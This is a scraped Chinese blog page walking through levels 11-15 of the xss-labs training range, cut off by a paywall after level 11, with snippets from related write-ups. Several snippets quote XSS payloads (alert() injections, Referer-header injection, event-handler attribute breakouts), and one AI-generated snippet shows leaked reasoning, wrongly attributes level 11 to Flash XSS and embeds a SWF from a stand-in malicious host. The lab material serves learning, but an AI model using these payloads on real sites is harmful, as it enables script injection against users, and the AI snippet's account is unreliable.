xss-labs通关详解 Level 11-15

最新推荐文章于 2024-11-14 16:18:52 发布

zhuyuemoonshine

最新推荐文章于 2024-11-14 16:18:52 发布

阅读量1.3k

点赞数 1

文章标签： xss 前端 html 网络安全

本文链接：https://blog.youkuaiyun.com/qq_41755084/article/details/127527162

版权

本文详细介绍了XSS Labs的Level 11至15的通关过程，包括利用HTML实体编码绕过防御、通过HTTP头部、请求字段及Cookie值注入XSS代码，以及针对ng-include漏洞的利用方法，展示了XSS攻击的不同场景和技术。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

Level 11-15

Level 11

这一关比上一关多了一个<input>标签，其他没有变化，先试一下上一关的注入语句。

在这里插入图片描述

发现在t_sort的<input>标签中的"被编码成了html实体字符，没办法正常闭合了。

而t_ref的值看起来像是请求的referer头。

HTTP Referer 是 header 的一部分，当浏览器向 web 服务器发送请求的时候，一般会带上 Referer，用来表示从哪儿链接到当前的网页，服务器因此可以获得一些信息用于处理，采用的格式是 URL

那我们将上一关的代码从referer头处传入。

在这里插入图片描述

页面中出现了输入框，点击该输入框，弹窗成功。

在这里插入图片描述

Level 12

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

zhuyuemoonshine

关注关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

xss-labs11-20关

qq_46527080的博客

12-25

618

第十一关（referer注入）源码分析第一行的php的函数，服务器和执行环境信息，他里面给清楚了，就是接受referer信息第二行替换掉了<>标签，我们就应该清楚要进行时间创造，不能进行标签注入了第三行是将接受的第一个参数进行了html实体转换第四行就是接受referer信息信息我们结合第十关的思想进行注入验证那结合第10关的思想还真过去了 payload为 "test" onclick="alert(1)" 第二种方法在bp中抓包构造referer的payload进行转发（

xss-labs通关详解 Level 6-10

qq_41755084的博客

10-25

1133

这一关整体上与第五关类似，只是黑名单的量增加了，尝试了href、src等字段，都被替换掉了。不过这个黑名单是大小写敏感的，而在html语句中，大小写不敏感。我们可以使用大小写字段进行绕过。构造注入代码从keyword参数处传入。将href的f大写，变为hreF，绕过黑名单，页面上成功插入了标签。点击该标签，成功弹窗。

参与评论您还未登录，请先登录后发表或查看评论

XSS挑战赛(xsslabs)11~16关通关解析

黄乔国PHP

03-07

778

总的来说xsslabs还是很有代表意义的，里面提供了很多绕过和防御XSS的思路。所谓知己知彼在这里面体现的淋漓尽致了。

XSS LABS - Level 11 过关思路

Blue17 の小窝

08-26

1060

我们在测试过，对其传参并不会回显后就直接放弃了对其的测试。客户小红，在 A 网站的管理后台上操作时，不小心点击到了广告链接，此广告会直接跳转到 B 网站（携带 Referer 字段），Hacker 通过查看后台获取的 Referer 字段，成功冒充小红的身份，进入 A 网站。那攻击者是否可以也编写一个插件，内部隐藏攻击代码，如果受害者电脑上安装了此插件，并且访问了指定站点（含有 XSS 漏洞的站点），插件自动触发攻击，重新请求该页面，并修改 Referer 字段，导致页面被篡改。

Xss-labs 第 11 - 20 关通过笔记

weixin_45619494的博客

10-25

317

alert(1)看看过滤。写入payload alert(1) 试试。检测源代码，发现 t_cook，可能为cookie，试试抓包修改cookie值。这就是个互动的东西，试试alert(1)抓包写入alert(1)

xss-labs靶场第十一关至十九关靶场报告

lkx18291546261的博客

11-14

898

here

xss-labs通关详解 Level 1-5

qq_41755084的博客

10-25

941

测试xss漏洞的JavaScript弹窗代码：

XSS-labs通关（超详细）

wulanlin的博客

12-30

7251

1.第一关 payload： http://xss/level1.php?name=<Script>alert(1)</Script> 2.第二关这里变量出现在两处，我们直接利用第二处，做构造以及闭合 payload： 1"><ScRipt>alert(1)</ScRipt> 3.第三关用第二关的payload去试一下，发现内容没变化，但是就是没当成js代码查一下网页源代码和php代码看到使

XSS—xss-labs靶场通关

qq_62987084的博客

09-22

1060

xss-labs靶场通关详解

xss level11

weixin_34033624的博客

05-07

646

Level11 （1）（2）毫无头绪，查看PHP源代码发现，是从头文件的referer获取的输入。（3）用Burp抓包，修改头文件如下：（4）再点击Proxy界面的forward,回到浏览器页面如下（5）点击即可转载于:https://www.cnblogs.com/momoli/p/10827611.html...

Xss-labs（1）第一关到第十一关

m0_46412408的博客

09-25

824

Xss-labs靶场训练第一关：查看页面源代码回显playload长度：插入一段js代码，get传参，一个简单的插入顺利来到第二关，二话不说先直接尝试插入，并没有成功：查看页面源代码：特殊字符被实体转义了我们需要闭合掉双引号即可，构造payload，这一关是闭合绕过来到第三关，随便输入一个闭合弹窗试试，符号也被实体化了：查看php源码。

【渗透测试】---xss-labs闯关【15-18关】

qq_43168364的博客

08-22

1653

第十五关这一关使用了AngularJS框架，它可以通过<script>标签添加到HTML页面，它通过指令（其实就是新的属性）扩展了HTML。服务器端代码解析前端代码解析 ng-app 指令 ---- 初始化一个 AngularJS 应用程序。 ng-include 指令 ---- 用于包含外部的 HTML 文件。ng-include 属性的值可以是一个表达式，返回一个文件名。默认情况下，包含的文件需要包含在同一个域名下。（它的作用有点类似于PHP中的include函数）这里可以让n

XSS-Labs靶场1---11关

m0_72676086的博客

03-07

1505

[ 靶场环境篇 ] XSS-labs 靶场环境搭建(特别详细)_xss靶场搭建-优快云博客（该博主总结的较为详细，若侵权必删）输入检测确定标签没有过滤后，为了显示存在漏洞，需要插入 xss 攻击代码。常用的语句： less-1：第一关算基础关卡，本身没有什么考点：我们看到代码回显出test，随后我们查看源码。这里是直接使用get传参，将值传入str中。随后我们直接使用payload：随后完成该关：我们使用第一关的方法进行测试: 随后发现即使代码正常闭合，但我们并未得出结果，此时我们查看源

xss-labs靶场通关详解(11-15关)

Nai_zui_jiang的博客

08-27

468

进行抓包添加referer:click me!" type="button" οnmοuseοver="alert(/xss/)进行放包。

xss-labs通关攻略教程（level11~level 20）

m0_55854679的博客

07-24

2680

xss-labs通关攻略教程（level1~level 10） level 11——Referer信息在url处提交测试代码并查看源码 javascript：alert('xss') 查看服务器端源码在服务器端还将请求头中的referer头的值赋给了str11这个变量，再将变量值中的<和>删除之后就会插入到t_ref这个标签的value属性值中。而上一关的t_sort标签虽然也能接收并显示参数值，但是这个参数值是要用htmlspecialchars()函数处理的。使用burp抓包

XSS-Labs挑战笔记Level11-20

When you collect everything, you understand nothing.

10-12

930

Level 11 后台源码： <!DOCTYPE html><html> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <script> window.alert = function() ...

xss-labs 11-18通关攻略

Alexz__的博客

03-17

919

http://alexzspace.cn/?p=144

【网络安全 --- xss-labs靶场通关（11-20关）】详细的xss-labs靶场通关思路及技巧讲解，让你对xss漏洞的理解更深刻

m0_67844671的博客

10-23

2544

【网络安全 --- xss-labs靶场通关（11-20关）】详细的xss-labs靶场通关思路及技巧讲解，让你对xss漏洞的理解更深刻

XSS-11注入靶场闯关(小游戏)——第十一关

qq_39330735的博客

02-04

583

XSS-11注入靶场闯关(小游戏)——第十一关通关详解，请求头referer注入

xss-labs靶场通关详解11

最新发布

03-12

<think>好的，我现在需要帮助用户解决XSS-Labs第11关的问题。首先，我得回顾用户提供的引用内容，尤其是引用[3]，里面提到了第11关的情况。根据描述，这一关使用了htmlspecialchars()函数处理输入，导致无法通过常规的双引号闭合进行XSS攻击。同时，这一关采用的是Flash XSS攻击，可能涉及加载第三方资源或与JavaScript通信。接下来，我需要确认htmlspecialchars()函数的作用。这个函数默认会转换双引号、单引号、&符号、尖括号等为HTML实体，但用户提到双引号被处理了，所以可能需要找到未被过滤的地方。例如，如果函数的参数设置中没有处理单引号，或者某些属性未被正确转义，可能存在注入点。然后，考虑Flash XSS的两种方式。加载第三方资源可能需要构造一个恶意的SWF文件，或者利用现有的Flash文件中的漏洞。另一种方式是通过Flash与JavaScript的通信接口，比如ExternalInterface.call，来执行恶意代码。用户可能没有注意到输入点的其他属性，比如onclick、onmouseover等事件处理器，或者某些标签的属性如href、src等是否被正确过滤。例如，如果某个参数未经过滤，可能可以插入JavaScript伪协议，如javascript:alert(1)。此外，需要测试不同的注入点。用户可能在尝试闭合双引号时遇到了阻碍，但也许可以通过其他属性或事件来绕过。例如，如果输入被插入到某个标签的属性中，可以尝试闭合该属性并添加新的事件处理器。可能还需要检查响应页面中的HTML源码，看输入内容是如何被处理的。是否有某些字符被转义，哪些地方没有被转义。例如，如果输入出现在<input>标签的value属性中，并且双引号被转义，但单引号没有被转义，可以尝试使用单引号闭合。最后，结合引用[3]提到的Flash XSS，可能需要构造特定的Payload，利用Flash的参数来执行脚本。例如，在SWF文件的参数中注入恶意代码，或者利用跨域策略文件的问题。</think>### XSS-Labs Level 11 解题思路这一关的核心在于**绕过htmlspecialchars()过滤**并利用**Flash XSS漏洞**，具体步骤如下： 1. **分析过滤机制** 根据引用[^3]，输入的双引号会被htmlspecialchars()转换为HTML实体（如`"`），导致常规闭合失效。但需要注意： ```html  <param name="value" value="用户输入内容"> ``` 若`htmlspecialchars()`未过滤单引号，则可尝试用单引号闭合属性： `' onclick=alert(1) '` 2. **利用Flash参数注入** Flash的`allowScriptAccess`参数若配置为`always`，可通过`flashvars`参数传递恶意代码： ```html <embed src="xss11.swf" flashvars="xss=javascript:alert(document.domain)"> ``` 若服务器未对`flashvars`做过滤，可直接触发XSS。 3. **测试隐藏输入点** 发现页面存在未公开的隐藏参数`t_link`或`t_history`，可能绕过常规过滤： ```http http://xss-labs.com/level11.php?t_link=javascript:alert(1) ``` §§相关解决方案§§ ```html  '><embed src="http://malicious.com/xss.swf" allowScriptAccess=always> ``` 此Payload会闭合原有标签并加载恶意SWF文件，利用Flash漏洞触发脚本执行。